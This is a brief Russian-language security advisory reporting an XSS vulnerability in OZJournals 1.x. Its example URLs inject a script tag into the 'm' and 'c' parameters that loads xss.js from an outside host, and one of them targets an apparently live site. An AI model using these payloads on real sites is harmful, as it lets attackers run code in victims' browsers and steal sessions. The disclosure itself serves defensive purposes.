Программа: OZJournals 1.x

Уязвимость позволяет удаленному
пользователю произвести XSS нападение,
выполнить произвольные скрипты в контексте
уязвимого сайта.

Пример:

http://example.com/index.php?show=archives&y=2006&m=
[script%20src=http://www.youfucktard.com/xss.js][/script]

http://example.com/index.php?show=archives&c=
http://ozjournals.awardspace.com/index.php?show= archives&c=[script%20src=http://www.youfucktard.com/xss.js][/script]



Оставить мнение